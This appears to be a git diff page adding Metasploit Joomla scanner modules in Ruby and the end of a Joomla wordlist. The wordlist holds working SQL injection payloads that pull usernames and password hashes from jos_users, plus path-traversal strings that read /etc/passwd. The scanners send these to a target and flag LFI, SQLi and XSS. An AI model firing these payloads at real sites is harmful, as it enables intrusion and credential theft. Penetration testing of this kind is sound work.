|
||||||
|
index.php?option=com_szallasok&mode=8&id=25 (SQL)
|
||||||
|
index.php?option=com_tag&task=tag&tag=
|
||||||
|
index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--
|
||||||
|
index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users
|
||||||
|
index.php?option=com_ultimateportfolio&controller=
|
||||||
|
index.php?option=com_users&view=registration
|
||||||
|
index.php?option=com_virtuemart&page=account.index&keyword=[sqli]
|
||||||
|
index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
|
||||||
|
index.php?option=com_x-shop&action=artdetail&idd='
|
||||||
|
index.php?option=com_x-shop&action=artdetail&idd='[SQLi]
|
||||||
|
index.php?option=com_xcomp&controller=../../[LFI]%00
|
||||||
|
index.php?option=com_xvs&controller=../../[LFI]%00
|
||||||
|
index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users--
|
||||||
|
index.php?option=com_yjcontactus&view=
|
||||||
|
index.php?option=com_youtube&id_cate=4
|
||||||
|
index.php?option=com_zina&view=zina&Itemid=9
|
||||||
|
index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=
|
||||||
|
index.php?search=NoGe&option=com_esearch&searchId=
|
||||||
|
index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube
|
||||||
|
index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--
|
||||||
|
js/index.php?option=com_socialads&view=showad&Itemid=94
|
||||||
|
libraries/joomla/utilities/compat/php50x.php
|
||||||
|
libraries/pcl/pcltar.php
|
||||||
|
libraries/phpmailer/phpmailer.php
|
||||||
|
libraries/phpxmlrpc/xmlrpcs.php
|
||||||
|
modules/mod_artuploader/upload.php");
|
||||||
|
modules/mod_as_category.php
|
||||||
|
modules/mod_calendar.php
|
||||||
|
modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]
|
||||||
|
modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream");
|
||||||
|
modules/mod_jfancy/script.php");
|
||||||
|
modules/mod_ppc_simple_spotlight/elements/upload_file.php
|
||||||
|
modules/mod_ppc_simple_spotlight/img/
|
||||||
|
modules/mod_pxt/
|
||||||
|
modules/mod_quick_question.php
|
||||||
|
modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0
|
||||||
|
patch/makedown.php?arquivo=../../../../etc/passwd
|
||||||
|
plugins/content/efup_files/helper.php");
|
||||||
|
plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data">
|
||||||
|
plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
|
||||||
|
plugins/editors/xstandard/attachmentlibrary.php
|
||||||
|
print.php?task=person&id=36 and 1=1
|
||||||
|
templates/be2004-2/
|
||||||
|
templates/ja_purity/
|
||||||
|
wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
|
||||||
|
web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
|
|
@ -0,0 +1,109 @@
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/
|
||||||
|
##
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Auxiliary::Scanner
|
||||||
|
include Msf::Auxiliary::Report
|
||||||
|
|
||||||
|
# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to
|
||||||
|
# Joomscan and various MSF modules for code examples.
|
||||||
|
def initialize
|
||||||
|
super(
|
||||||
|
'Name' => 'Joomla Version Scanner',
|
||||||
|
'Description' => %q{
|
||||||
|
This module scans a Joomla install for common pages.
|
||||||
|
},
|
||||||
|
'Author' => [ 'newpid0' ],
|
||||||
|
'License' => MSF_LICENSE
|
||||||
|
)
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/'])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
def peer
|
||||||
|
return "#{rhost}:#{rport}"
|
||||||
|
end
|
||||||
|
|
||||||
|
def run_host(ip)
|
||||||
|
tpath = normalize_uri(target_uri.path)
|
||||||
|
if tpath[-1,1] != '/'
|
||||||
|
tpath += '/'
|
||||||
|
end
|
||||||
|
|
||||||
|
pages = [
|
||||||
|
'robots.txt',
|
||||||
|
'administrator/index.php',
|
||||||
|
'admin/',
|
||||||
|
'index.php/using-joomla/extensions/components/users-component/registration-form',
|
||||||
|
'index.php/component/users/?view=registration',
|
||||||
|
'htaccess.txt'
|
||||||
|
]
|
||||||
|
|
||||||
|
vprint_status("#{peer} - Checking for interesting pages")
|
||||||
|
pages.each do |page|
|
||||||
|
scan_pages(tpath, page, ip)
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
|
|
||||||
|
def scan_pages(tpath, page, ip)
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => "#{tpath}#{page}",
|
||||||
|
'method' => 'GET',
|
||||||
|
})
|
||||||
|
return if not res or not res.body or not res.code
|
||||||
|
res.body.gsub!(/[\r|\n]/, ' ')
|
||||||
|
|
||||||
|
if (res.code == 200)
|
||||||
|
note = "Page Found"
|
||||||
|
if (res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/)
|
||||||
|
note = "Administrator Login Page"
|
||||||
|
elsif (res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/)
|
||||||
|
note = "Registration Page"
|
||||||
|
end
|
||||||
|
|
||||||
|
print_good("#{peer} - #{note}: #{tpath}#{page}")
|
||||||
|
|
||||||
|
report_note(
|
||||||
|
:host => ip,
|
||||||
|
:port => datastore['RPORT'],
|
||||||
|
:proto => 'http',
|
||||||
|
:ntype => 'joomla_page',
|
||||||
|
:data => "#{note}: #{tpath}#{page}",
|
||||||
|
:update => :unique_data
|
||||||
|
)
|
||||||
|
elsif (res.code == 403)
|
||||||
|
if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
|
||||||
|
vprint_status("#{ip} denied access to #{ip} (SSL Required)")
|
||||||
|
elsif (res.body =~ /has a list of IP addresses that are not allowed/)
|
||||||
|
vprint_status("#{ip} restricted access by IP")
|
||||||
|
elsif (res.body =~ /SSL client certificate is required/)
|
||||||
|
vprint_status("#{ip} requires a SSL client certificate")
|
||||||
|
else
|
||||||
|
vprint_status("#{ip} ip access to #{ip} #{res.code} #{res.message}")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
return
|
||||||
|
|
||||||
|
rescue OpenSSL::SSL::SSLError
|
||||||
|
vprint_error("#{peer} - SSL error")
|
||||||
|
return
|
||||||
|
rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
|
||||||
|
vprint_error("#{peer} - Unable to Connect")
|
||||||
|
return
|
||||||
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||||
|
vprint_error("#{peer} - Timeout error")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
|
@ -0,0 +1,175 @@
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/
|
||||||
|
##
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Auxiliary::Scanner
|
||||||
|
include Msf::Auxiliary::Report
|
||||||
|
|
||||||
|
# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to
|
||||||
|
# Joomscan and various MSF modules for code examples.
|
||||||
|
def initialize
|
||||||
|
super(
|
||||||
|
'Name' => 'Joomla Plugins Scanner',
|
||||||
|
'Description' => %q{
|
||||||
|
This module scans a Joomla install for plugins and potential
|
||||||
|
vulnerabilities.
|
||||||
|
},
|
||||||
|
'Author' => [ 'newpid0' ],
|
||||||
|
'License' => MSF_LICENSE
|
||||||
|
)
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/']),
|
||||||
|
OptPath.new('PLUGINS', [ true, "Path to list of plugins to enumerate", File.join(Msf::Config.install_root, "data", "wordlists", "joomla.txt")])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
def peer
|
||||||
|
return "#{rhost}:#{rport}"
|
||||||
|
end
|
||||||
|
|
||||||
|
def run_host(ip)
|
||||||
|
tpath = normalize_uri(target_uri.path)
|
||||||
|
if tpath[-1,1] != '/'
|
||||||
|
tpath += '/'
|
||||||
|
end
|
||||||
|
|
||||||
|
vprint_status("#{peer} - Checking for interesting plugins")
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => tpath,
|
||||||
|
'method' => 'GET'
|
||||||
|
})
|
||||||
|
return if res.nil?
|
||||||
|
|
||||||
|
res.body.gsub!(/[\r|\n]/, ' ')
|
||||||
|
File.open(datastore['PLUGINS'], 'rb').each_line do |line|
|
||||||
|
papp = line.chomp
|
||||||
|
plugin_search(tpath, papp, ip, res.body.size)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def plugin_search(tpath, papp, ip, osize)
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => "#{tpath}#{papp}",
|
||||||
|
'method' => 'GET'
|
||||||
|
})
|
||||||
|
return if res.nil?
|
||||||
|
|
||||||
|
res.body.gsub!(/[\r|\n]/, ' ')
|
||||||
|
nsize = res.body.size
|
||||||
|
|
||||||
|
if (res.code == 200 and res.body !~/#404 Component not found/ and res.body !~/<h1>Joomla! Administration Login<\/h1>/ and osize != nsize)
|
||||||
|
print_good("#{peer} - Plugin: #{tpath}#{papp} ")
|
||||||
|
report_note(
|
||||||
|
:host => ip,
|
||||||
|
:port => rport,
|
||||||
|
:proto => 'http',
|
||||||
|
:ntype => 'joomla_plugin',
|
||||||
|
:data => "#{tpath}#{papp}",
|
||||||
|
:update => :unique_data
|
||||||
|
)
|
||||||
|
|
||||||
|
if (papp =~/passwd/ and res.body =~/root/)
|
||||||
|
print_good("#{peer} - Vulnerability: Potential LFI")
|
||||||
|
report_web_vuln(
|
||||||
|
:host => ip,
|
||||||
|
:port => rport,
|
||||||
|
:vhost => vhost,
|
||||||
|
:ssl => ssl,
|
||||||
|
:path => tpath,
|
||||||
|
:method => "GET",
|
||||||
|
:pname => "",
|
||||||
|
:proof => "Response with code #{res.code} contains the 'root' signature",
|
||||||
|
:risk => 1,
|
||||||
|
:confidence => 10,
|
||||||
|
:category => 'Local File Inclusion',
|
||||||
|
:description => "Joomla: Potential LFI at #{tpath}#{papp}",
|
||||||
|
:name => 'Local File Inclusion'
|
||||||
|
)
|
||||||
|
elsif (res.body =~/SQL syntax/)
|
||||||
|
print_good("#{peer} - Vulnerability: Potential SQL Injection")
|
||||||
|
report_web_vuln(
|
||||||
|
:host => ip,
|
||||||
|
:port => rport,
|
||||||
|
:vhost => vhost,
|
||||||
|
:ssl => ssl,
|
||||||
|
:path => tpath,
|
||||||
|
:method => "GET",
|
||||||
|
:pname => "",
|
||||||
|
:proof => "Response with code #{res.code} contains the 'SQL syntax' signature",
|
||||||
|
:risk => 1,
|
||||||
|
:confidence => 10,
|
||||||
|
:category => 'SQL Injection',
|
||||||
|
:description => "Joomla: Potential SQLI at #{tpath}#{papp}",
|
||||||
|
:name => 'SQL Injection'
|
||||||
|
)
|
||||||
|
elsif (papp =~/>alert/ and res.body =~/>alert/)
|
||||||
|
print_good("#{peer} - Vulnerability: Potential XSS")
|
||||||
|
report_web_vuln(
|
||||||
|
:host => ip,
|
||||||
|
:port => rport,
|
||||||
|
:vhost => vhost,
|
||||||
|
:ssl => ssl,
|
||||||
|
:path => tpath,
|
||||||
|
:method => "GET",
|
||||||
|
:pname => "",
|
||||||
|
:proof => "Response with code #{res.code} contains the '>alert' signature",
|
||||||
|
:risk => 1,
|
||||||
|
:confidence => 10,
|
||||||
|
:category => 'Cross Site Scripting',
|
||||||
|
:description => "Joomla: Potential XSS at #{tpath}#{papp}",
|
||||||
|
:name => 'Cross Site Scripting'
|
||||||
|
)
|
||||||
|
elsif (papp =~/com_/)
|
||||||
|
vars = papp.split('_')
|
||||||
|
pages = vars[1].gsub('/','')
|
||||||
|
res1 = send_request_cgi({
|
||||||
|
'uri' => "#{tpath}index.php?option=com_#{pages}",
|
||||||
|
'method' => 'GET'
|
||||||
|
})
|
||||||
|
if (res1.code == 200)
|
||||||
|
print_good("#{peer} - Page: #{tpath}index.php?option=com_#{pages}")
|
||||||
|
report_note(
|
||||||
|
:host => ip,
|
||||||
|
:port => datastore['RPORT'],
|
||||||
|
:proto => 'http',
|
||||||
|
:ntype => 'joomla_page',
|
||||||
|
:data => "Page: #{tpath}index.php?option=com_#{pages}",
|
||||||
|
:update => :unique_data
|
||||||
|
)
|
||||||
|
else
|
||||||
|
vprint_error("#{peer} - Page: #{tpath}index.php?option=com_#{pages} gave a #{res1.code} response")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
elsif (res.code == 403)
|
||||||
|
if (res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
|
||||||
|
vprint_status("#{ip} ip access to #{ip} (SSL Required)")
|
||||||
|
elsif (res.body =~ /has a list of IP addresses that are not allowed/)
|
||||||
|
vprint_status("#{ip} restricted access by IP")
|
||||||
|
elsif (res.body =~ /SSL client certificate is required/)
|
||||||
|
vprint_status("#{ip} requires a SSL client certificate")
|
||||||
|
else
|
||||||
|
vprint_status("#{ip} denied access to #{ip}#{tpath}#{papp} - #{res.code} #{res.message}")
|
||||||
|
end
|
||||||
|
end
|
||||||
|
return
|
||||||
|
|
||||||
|
rescue OpenSSL::SSL::SSLError
|
||||||
|
vprint_error("#{peer} - SSL error")
|
||||||
|
return
|
||||||
|
rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
|
||||||
|
vprint_error("#{peer} - Unable to Connect")
|
||||||
|
return
|
||||||
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||||
|
vprint_error("#{peer} - Timeout error")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
|
@ -0,0 +1,176 @@
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/
|
||||||
|
##
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Auxiliary
|
||||||
|
|
||||||
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
include Msf::Auxiliary::Scanner
|
||||||
|
include Msf::Auxiliary::Report
|
||||||
|
|
||||||
|
# Huge thanks to @zeroSteiner for helping me. Also thanks to @kaospunk. Finally thanks to
|
||||||
|
# Joomscan and various MSF modules for code examples.
|
||||||
|
def initialize
|
||||||
|
super(
|
||||||
|
'Name' => 'Joomla Version Scanner',
|
||||||
|
'Description' => %q{
|
||||||
|
This module scans a Joomla install for information about the underlying
|
||||||
|
operating system and Joomla version.
|
||||||
|
},
|
||||||
|
'Author' => [ 'newpid0' ],
|
||||||
|
'License' => MSF_LICENSE
|
||||||
|
)
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('TARGETURI', [ true, "The path to the Joomla install", '/'])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
def peer
|
||||||
|
return "#{rhost}:#{rport}"
|
||||||
|
end
|
||||||
|
|
||||||
|
def os_fingerprint(response)
|
||||||
|
if not response.headers.has_key?('Server')
|
||||||
|
return "Unkown OS (No Server Header)"
|
||||||
|
end
|
||||||
|
|
||||||
|
case response.headers['Server']
|
||||||
|
when /Win32/
|
||||||
|
when /\(Windows/
|
||||||
|
when /IIS/
|
||||||
|
os = "Windows"
|
||||||
|
when /Apache\//
|
||||||
|
os = "*Nix"
|
||||||
|
else
|
||||||
|
os = "Unknown Server Header Reporting: "+response.headers['Server']
|
||||||
|
end
|
||||||
|
return os
|
||||||
|
end
|
||||||
|
|
||||||
|
def fingerprint(response)
|
||||||
|
case response.body
|
||||||
|
when /<version.*\/?>(.+)<\/version\/?>/i
|
||||||
|
v = $1
|
||||||
|
out = (v =~ /^6/) ? "Joomla #{v}" : " #{v}"
|
||||||
|
when /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/
|
||||||
|
when /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/
|
||||||
|
when /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/
|
||||||
|
when /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/
|
||||||
|
when /20196 2011\-01\-09 02\:40\:25Z ian/
|
||||||
|
out = "1.6"
|
||||||
|
when /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley /
|
||||||
|
when /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/
|
||||||
|
when /22183 2011\-09\-30 09\:04\:32Z infograf768/
|
||||||
|
when /21660 2011\-06\-23 13\:25\:32Z infograf768/
|
||||||
|
out = "1.7"
|
||||||
|
when /Joomla! 1.5/
|
||||||
|
when /MooTools\=\{version\:\'1\.12\'\}/
|
||||||
|
when /11391 2009\-01\-04 13\:35\:50Z ian/
|
||||||
|
out = "1.5"
|
||||||
|
when /Copyright \(C\) 2005 \- 2012 Open Source Matters/
|
||||||
|
when /MooTools.More\=\{version\:\"1\.4\.0\.1\"/
|
||||||
|
out = "2.5"
|
||||||
|
when /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/
|
||||||
|
out = $1.split(/,/)[0]
|
||||||
|
when /(Copyright \(C\) 2005 - 200(6|7))/
|
||||||
|
when /47 2005\-09\-15 02\:55\:27Z rhuk/
|
||||||
|
when /423 2005\-10\-09 18\:23\:50Z stingrey/
|
||||||
|
when /1005 2005\-11\-13 17\:33\:59Z stingrey/
|
||||||
|
when /1570 2005\-12\-29 05\:53\:33Z eddieajau/
|
||||||
|
when /2368 2006\-02\-14 17\:40\:02Z stingrey/
|
||||||
|
when /4085 2006\-06\-21 16\:03\:54Z stingrey/
|
||||||
|
when /4756 2006\-08\-25 16\:07\:11Z stingrey/
|
||||||
|
when /5973 2006\-12\-11 01\:26\:33Z robs/
|
||||||
|
when /5975 2006\-12\-11 01\:26\:33Z robs/
|
||||||
|
out = "1.0"
|
||||||
|
else
|
||||||
|
out = 'Unknown Joomla'
|
||||||
|
end
|
||||||
|
return out
|
||||||
|
end
|
||||||
|
|
||||||
|
def check_file(tpath, file, ip)
|
||||||
|
res = send_request_cgi({
|
||||||
|
'uri' => "#{tpath}#{file}",
|
||||||
|
'method' => 'GET'
|
||||||
|
})
|
||||||
|
|
||||||
|
return :abort if res.nil?
|
||||||
|
|
||||||
|
res.body.gsub!(/[\r|\n]/, ' ')
|
||||||
|
|
||||||
|
if (res.code == 200)
|
||||||
|
os = os_fingerprint(res)
|
||||||
|
out = fingerprint(res)
|
||||||
|
return false if not out
|
||||||
|
|
||||||
|
if(out =~ /Unknown Joomla/)
|
||||||
|
print_error("#{peer} - Unable to identify Joomla Version with #{file}")
|
||||||
|
return false
|
||||||
|
else
|
||||||
|
print_good("#{peer} - Joomla Version:#{out} from: #{file} ")
|
||||||
|
print_good("#{peer} - OS: #{os}")
|
||||||
|
report_note(
|
||||||
|
:host => ip,
|
||||||
|
:port => datastore['RPORT'],
|
||||||
|
:proto => 'http',
|
||||||
|
:ntype => 'joomla_version',
|
||||||
|
:data => out
|
||||||
|
)
|
||||||
|
return true
|
||||||
|
end
|
||||||
|
elsif (res.code == 403)
|
||||||
|
if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
|
||||||
|
vprint_status("#{ip} denied access to #{ip} (SSL Required)")
|
||||||
|
elsif(res.body =~ /has a list of IP addresses that are not allowed/)
|
||||||
|
vprint_status("#{ip} restricted access by IP")
|
||||||
|
elsif(res.body =~ /SSL client certificate is required/)
|
||||||
|
vprint_status("#{ip} requires a SSL client certificate")
|
||||||
|
else
|
||||||
|
vprint_status("#{ip} denied access to #{ip} #{res.code} #{res.message}")
|
||||||
|
end
|
||||||
|
return :abort
|
||||||
|
end
|
||||||
|
|
||||||
|
return false
|
||||||
|
|
||||||
|
rescue OpenSSL::SSL::SSLError
|
||||||
|
vprint_error("#{peer} - SSL error")
|
||||||
|
return :abort
|
||||||
|
rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
|
||||||
|
vprint_error("#{peer} - Unable to Connect")
|
||||||
|
return :abort
|
||||||
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||||
|
vprint_error("#{peer} - Timeout error")
|
||||||
|
return :abort
|
||||||
|
end
|
||||||
|
|
||||||
|
def run_host(ip)
|
||||||
|
tpath = normalize_uri(target_uri.path)
|
||||||
|
if tpath[-1,1] != '/'
|
||||||
|
tpath += '/'
|
||||||
|
end
|
||||||
|
|
||||||
|
files = [
|
||||||
|
'language/en-GB/en-GB.xml',
|
||||||
|
'templates/system/css/system.css',
|
||||||
|
'media/system/js/mootools-more.js',
|
||||||
|
'language/en-GB/en-GB.ini',
|
||||||
|
'htaccess.txt',
|
||||||
|
'language/en-GB/en-GB.com_media.ini'
|
||||||
|
]
|
||||||
|
|
||||||
|
vprint_status("#{peer} - Checking Joomla version")
|
||||||
|
files.each do |file|
|
||||||
|
joomla_found = check_file(tpath, file, ip)
|
||||||
|
return if joomla_found == :abort
|
||||||
|
break if joomla_found
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
Loading…
Reference in New Issue